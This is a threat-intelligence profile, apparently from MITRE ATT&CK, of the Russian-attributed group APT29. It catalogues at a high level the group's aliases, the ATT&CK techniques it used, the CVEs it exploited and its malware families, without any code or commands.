APT29

APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008. [1] [2] This group reportedly compromised the Democratic National Committee starting in the summer of 2015. [3]

ID: G0016
Associated Groups: YTTRIUM, The Dukes, Cozy Bear, CozyDuke
Version: 1.4
Created: 31 May 2017
Last Modified: 22 October 2020

Associated Group Descriptions

Name Description
YTTRIUM

[4]

The Dukes

[1][5][6]

Cozy Bear

[3][5][6]

CozyDuke

[3]

Techniques Used

Domain ID Name Use
Enterprise T1548 .002 Abuse Elevation Control Mechanism: Bypass User Account Control

APT29 has bypassed UAC.[7]

Enterprise T1583 .006 Acquire Infrastructure: Web Services

APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware, such as HAMMERTOSS.[8]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

APT29 added Registry Run keys to establish persistence.[7]

.009 Boot or Logon Autostart Execution: Shortcut Modification

APT29 drops a Windows shortcut file for execution.[9]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke. APT29 also used PowerShell scripts to evade defenses.[10][7][9]

.006 Command and Scripting Interpreter: Python

APT29 has developed malware variants written in Python.[5]

Enterprise T1001 .002 Data Obfuscation: Steganography

APT29 has used steganography to hide C2 communications in images.[5]

Enterprise T1587 .003 Develop Capabilities: Digital Certificates

APT29 has created self-signed digital certificates to enable mutual TLS authentication for malware.[11][12]

Enterprise T1546 .008 Event Triggered Execution: Accessibility Features

APT29 used sticky-keys to obtain unauthenticated, privileged console access.[7][13]

.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription

APT29 has used WMI to establish persistence.[7][5]

Enterprise T1190 Exploit Public-Facing Application

APT29 has exploited CVE-2019-19781 for Citrix, CVE-2019-11510 for Pulse Secure VPNs, CVE-2018-13379 for FortiGate VPNs, and CVE-2019-9670 in Zimbra software to gain access.[6]

Enterprise T1203 Exploitation for Client Execution

APT29 has used multiple software exploits for common client software, like Microsoft Word and Adobe Reader, to gain code execution as part of.[1]

Enterprise T1070 .004 Indicator Removal on Host: File Deletion

APT29 used SDelete to remove artifacts from victims.[7]

Enterprise T1095 Non-Application Layer Protocol

APT29 uses TCP for C2 communications.[9]

Enterprise T1027 Obfuscated Files or Information

APT29 uses PowerShell to use Base64 for obfuscation.[9]

.002 Software Packing

APT29 used UPX to pack files.[7]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.[1][9][5]

.002 Phishing: Spearphishing Link

APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.[7]

Enterprise T1090 .003 Proxy: Multi-hop Proxy

A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network.[7]

.004 Proxy: Domain Fronting

APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.[7]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

APT29 used named and hijacked scheduled tasks to establish persistence.[7]

Enterprise T1218 .011 Signed Binary Proxy Execution: Rundll32

APT29 has used rundll32.exe for execution.[9]

Enterprise T1550 .003 Use Alternate Authentication Material: Pass the Ticket

APT29 used Kerberos ticket attacks for lateral movement.[7]

Enterprise T1204 .002 User Execution: Malicious File

APT29 has used various forms of spearphishing attempting to get a user to open links or attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files. [1] [9][5]

Enterprise T1078 .002 Valid Accounts: Domain Accounts

APT29 has used valid accounts, including administrator accounts, to help facilitate lateral movement on compromised networks.[5][6]

Enterprise T1102 .002 Web Service: Bidirectional Communication

APT29 has used social media platforms to hide communications to C2 servers.[5]

Enterprise T1047 Windows Management Instrumentation

APT29 used WMI to steal credentials and execute backdoors at a future time.[7]

Software

ID Name References Techniques
S0054 CloudDuke [1] Application Layer Protocol: Web Protocols, Ingress Tool Transfer, Web Service: Bidirectional Communication
S0154 Cobalt Strike [9] Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: Token Impersonation/Theft, Access Token Manipulation: Parent PID Spoofing, Access Token Manipulation: Make and Impersonate Token, Account Discovery: Domain Account, Application Layer Protocol, Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, BITS Jobs, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: Python, Commonly Used Port, Create or Modify System Process: Windows Service, Data from Local System, Exploitation for Privilege Escalation, Indicator Removal on Host: Timestomp, Input Capture: Keylogging, Man in the Browser, Multiband Communication, Native API, Network Service Scanning, Network Share Discovery, Obfuscated Files or Information: Indicator Removal from Tools, OS Credential Dumping: Security Account Manager, Process Discovery, Process Injection, Process Injection: Process Hollowing, Protocol Tunneling, Proxy: Internal Proxy, Remote Services: SMB/Windows Admin Shares, Remote Services: Windows Remote Management, Remote Services: SSH, Remote Services: Remote Desktop Protocol, Remote Services: Distributed Component Object Model, Remote System Discovery, Scheduled Transfer, Screen Capture, System Network Configuration Discovery, System Services: Service Execution, Use Alternate Authentication Material: Pass the Hash, Valid Accounts: Local Accounts, Valid Accounts: Domain Accounts, Windows Management Instrumentation
S0050 CosmicDuke [1] Application Layer Protocol: Web Protocols, Automated Exfiltration, Clipboard Data, Create or Modify System Process: Windows Service, Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Data from Local System, Data from Network Shared Drive, Data from Removable Media, Email Collection: Local Email Collection, Encrypted Channel: Symmetric Cryptography, Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Exploitation for Privilege Escalation, File and Directory Discovery, Input Capture: Keylogging, OS Credential Dumping: LSA Secrets, OS Credential Dumping: Security Account Manager, Scheduled Task/Job: Scheduled Task, Screen Capture
S0046 CozyCar [1] Application Layer Protocol: Web Protocols, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Create or Modify System Process: Windows Service, Masquerading: Rename System Utilities, Obfuscated Files or Information, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSASS Memory, Scheduled Task/Job: Scheduled Task, Signed Binary Proxy Execution: Rundll32, Software Discovery: Security Software Discovery, System Information Discovery, Virtualization/Sandbox Evasion, Web Service: Bidirectional Communication
S0049 GeminiDuke [1] Account Discovery: Local Account, Application Layer Protocol: Web Protocols, File and Directory Discovery, Process Discovery, System Network Configuration Discovery, System Service Discovery
S0037 HAMMERTOSS [1] Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: PowerShell, Data Obfuscation: Steganography, Encrypted Channel: Symmetric Cryptography, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Hide Artifacts: Hidden Window, Web Service: One-Way Communication
S0100 ipconfig [14] System Network Configuration Discovery
S0175 meek [7] Proxy: Domain Fronting
S0002 Mimikatz [1] Access Token Manipulation: SID-History Injection, Account Manipulation, Boot or Logon Autostart Execution: Security Support Provider, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores, OS Credential Dumping: LSASS Memory, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSA Secrets, Rogue Domain Controller, Steal or Forge Kerberos Tickets: Silver Ticket, Steal or Forge Kerberos Tickets: Golden Ticket, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket
S0051 MiniDuke [1][5] Application Layer Protocol: Web Protocols, Create or Modify System Process, Dynamic Resolution: Domain Generation Algorithms, Fallback Channels, File and Directory Discovery, Ingress Tool Transfer, Obfuscated Files or Information, Proxy: Internal Proxy, System Information Discovery, Web Service: Dead Drop Resolver
S0039 Net [14] Account Discovery: Local Account, Account Discovery: Domain Account, Create Account: Local Account, Create Account: Domain Account, Indicator Removal on Host: Network Share Connection Removal, Network Share Discovery, Password Policy Discovery, Permission Groups Discovery: Local Groups, Permission Groups Discovery: Domain Groups, Remote Services: SMB/Windows Admin Shares, Remote System Discovery, System Network Connections Discovery, System Service Discovery, System Services: Service Execution, System Time Discovery
S0052 OnionDuke [1][5] Application Layer Protocol: Web Protocols, Deobfuscate/Decode Files or Information, Endpoint Denial of Service, OS Credential Dumping, Web Service: One-Way Communication
S0048 PinchDuke [1] Application Layer Protocol: Web Protocols, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores, Data from Local System, File and Directory Discovery, OS Credential Dumping, System Information Discovery
S0518 PolyglotDuke [5] Application Layer Protocol: Web Protocols, Deobfuscate/Decode Files or Information, Ingress Tool Transfer, Modify Registry, Native API, Obfuscated Files or Information: Steganography, Obfuscated Files or Information, Signed Binary Proxy Execution: Rundll32, Web Service: Dead Drop Resolver
S0150 POSHSPY [15] Command and Scripting Interpreter: PowerShell, Data Transfer Size Limits, Dynamic Resolution: Domain Generation Algorithms, Encrypted Channel: Asymmetric Cryptography, Event Triggered Execution: Windows Management Instrumentation Event Subscription, Indicator Removal on Host: Timestomp, Ingress Tool Transfer, Obfuscated Files or Information
S0139 PowerDuke [16] Application Window Discovery, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Commonly Used Port, Data Destruction, File and Directory Discovery, Hide Artifacts: NTFS File Attributes, Indicator Removal on Host: File Deletion, Ingress Tool Transfer, Obfuscated Files or Information: Steganography, Process Discovery, Signed Binary Proxy Execution: Rundll32, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery, System Time Discovery
S0029 PsExec [1][5] Lateral Tool Transfer, Remote Services: SMB/Windows Admin Shares, System Services: Service Execution
S0511 RegDuke [5] Command and Scripting Interpreter: PowerShell, Deobfuscate/Decode Files or Information, Event Triggered Execution: Windows Management Instrumentation Event Subscription, Ingress Tool Transfer, Modify Registry, Obfuscated Files or Information: Steganography, Obfuscated Files or Information, Web Service: Bidirectional Communication
S0195 SDelete [7] Data Destruction, Indicator Removal on Host: File Deletion
S0053 SeaDuke [1] Application Layer Protocol: Web Protocols, Archive Collected Data: Archive via Library, Boot or Logon Autostart Execution: Shortcut Modification, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Data Encoding: Standard Encoding, Email Collection: Remote Email Collection, Encrypted Channel: Symmetric Cryptography, Event Triggered Execution: Windows Management Instrumentation Event Subscription, Indicator Removal on Host: File Deletion, Ingress Tool Transfer, Obfuscated Files or Information: Software Packing, Use Alternate Authentication Material: Pass the Ticket, Valid Accounts
S0516 SoreFang [6][14] Account Discovery: Local Account, Account Discovery: Domain Account, Application Layer Protocol: Web Protocols, Deobfuscate/Decode Files or Information, Exploit Public-Facing Application, File and Directory Discovery, Ingress Tool Transfer, Obfuscated Files or Information, Permission Groups Discovery: Domain Groups, Process Discovery, Scheduled Task/Job: Scheduled Task, System Information Discovery, System Network Configuration Discovery
S0096 Systeminfo [14] System Information Discovery
S0057 Tasklist [14] Process Discovery, Software Discovery: Security Software Discovery, System Service Discovery
S0183 Tor [7] Encrypted Channel: Asymmetric Cryptography, Proxy: Multi-hop Proxy
S0515 WellMail [17][6] Archive Collected Data, Data from Local System, Deobfuscate/Decode Files or Information, Encrypted Channel: Asymmetric Cryptography, Ingress Tool Transfer, Non-Application Layer Protocol, Non-Standard Port, System Network Configuration Discovery, System Owner/User Discovery
S0514 WellMess [11][12][18][6] Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: PowerShell, Data Encoding: Standard Encoding, Data from Local System, Data Obfuscation: Junk Data, Deobfuscate/Decode Files or Information, Encrypted Channel: Symmetric Cryptography, Encrypted Channel: Asymmetric Cryptography, Ingress Tool Transfer, Permission Groups Discovery: Domain Groups, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery

References